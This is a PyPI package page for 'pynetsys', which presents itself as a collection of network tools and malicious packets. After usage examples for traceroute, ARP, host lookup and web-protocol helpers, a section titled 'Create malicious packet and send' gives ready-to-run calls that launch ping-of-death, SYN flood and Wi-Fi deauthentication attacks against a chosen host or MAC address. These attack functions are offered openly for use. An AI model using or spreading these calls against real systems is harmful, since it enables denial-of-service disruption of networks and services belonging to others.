pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets.
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
----------------
isonline = pynetsys.isOnline("python.org") --> bool
print(isonline)
haswebprotocol = pynetsys.hasWebProtocol("http:\\python.org") --> bool
OR
haswebprotocol = pynetsys.hasWebProtocol("python.org") --> bool
print(haswebprotocol)
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("https:\\python.org") --> bool
OR
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("python.org") --> bool
print(hasSSLwebprotocol)
addwebprotocol = pynetsys.addWebProtocol("python.org") --> str
print(addwebprotocol)
removewebprotocol = pynetsys.removeWebProtocol("https:\\python.org") --> str
OR
removewebprotocol = pynetsys.removeWebProtocol("http:\\python.org") --> str
print(removewebprotocol)
Create malicious packet and send
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pynetsys-0.1.6.tar.gz
(10.1 kB
view details)
Built Distribution
pynetsys-0.1.6-py3-none-any.whl
(10.2 kB
view details)
File details
Details for the file pynetsys-0.1.6.tar.gz
.
File metadata
- Download URL: pynetsys-0.1.6.tar.gz
- Upload date:
- Size: 10.1 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.7
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 58ef121ed453aaa14abba845c0eb7adb9c2e4741749b9d3c10f28d969af7db88 |
|
MD5 | 728c5fceae149f973ead133e4a82aa7e |
|
BLAKE2b-256 | e55f167372274dfa442062ca6586d97bd136e6d40675c4ca7ec8a4727c84f17b |
File details
Details for the file pynetsys-0.1.6-py3-none-any.whl
.
File metadata
- Download URL: pynetsys-0.1.6-py3-none-any.whl
- Upload date:
- Size: 10.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.7
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 97c1201f9043e2053569a4a1c0be67d4e0a5294f18c781b8beec3ddcf0362898 |
|
MD5 | c7fb5c2d37ea3e9745cf82adc10234e5 |
|
BLAKE2b-256 | 9677d62d66a79ab8279d88e08a70900020242606bcb1b329ec96af6775e90d2b |